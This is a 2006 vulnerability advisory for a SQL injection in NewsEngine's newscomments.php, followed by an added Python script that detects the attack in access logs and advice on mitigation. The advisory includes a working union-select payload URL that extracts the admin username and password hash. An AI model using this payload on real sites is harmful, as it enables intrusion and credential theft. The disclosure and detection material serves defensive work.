NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

2006-06-06T00:00:00
ID SECURITYVULNS:DOC:12997
Type securityvulns
Reporter Securityvulns
Modified 2006-06-06T00:00:00

Description

Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

Author : ajann

Vulnerability:

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='//union//select//0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from//news1_user//where/*/userid=1/

Admin MD5 hash
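A detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web-server access logs for `newscomments.php` requests whose `newsid` value is not a plain integer. The combined log format, the assumption that legitimate `newsid` values are integers, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(union|select|from|where)\b", re.I)

def check_newsid(value):
    """Return None if value is a plain integer id, else a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    # Comment markers and slashes used in place of whitespace become spaces,
    # so keywords glued together by them are visible to the token match.
    flattened = re.sub(r"/\*.*?\*/|/+|\*+", " ", value)
    if SQL_TOKENS.search(flattened):
        return "non-numeric newsid with SQL keywords"
    return "non-numeric newsid"

def scan(lines):
    """Yield (line_number, reason) for suspicious newscomments.php requests."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/newscomments.php"):
            continue
        # parse_qs URL-decodes values; keep_blank_values catches "newsid=".
        values = parse_qs(url.query, keep_blank_values=True).get("newsid", [])
        for value in values:
            reason = check_newsid(value)
            if reason:
                yield n, reason

# Constructed sample log lines (documentation IP addresses, made-up paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jun/2006:10:00:00 +0000] '
    '"GET /news/newscomments.php?newsid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Jun/2006:10:00:05 +0000] '
    '"GET /news/newscomments.php?newsid=%27//union//select//0,username,'
    'userpassword//from//news1_user HTTP/1.1" 200 4870',
    '198.51.100.7 - - [06/Jun/2006:10:00:09 +0000] '
    '"GET /news/newscomments.php?newsid=abc HTTP/1.1" 200 310',
    '203.0.113.5 - - [06/Jun/2006:10:00:12 +0000] '
    '"GET /news/index.php?q=union HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, reason in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}")
```

The same integer-only rule is the mitigation on the application side: reject or cast `newsid` before it reaches the query, and bind it as a parameter instead of concatenating it into SQL.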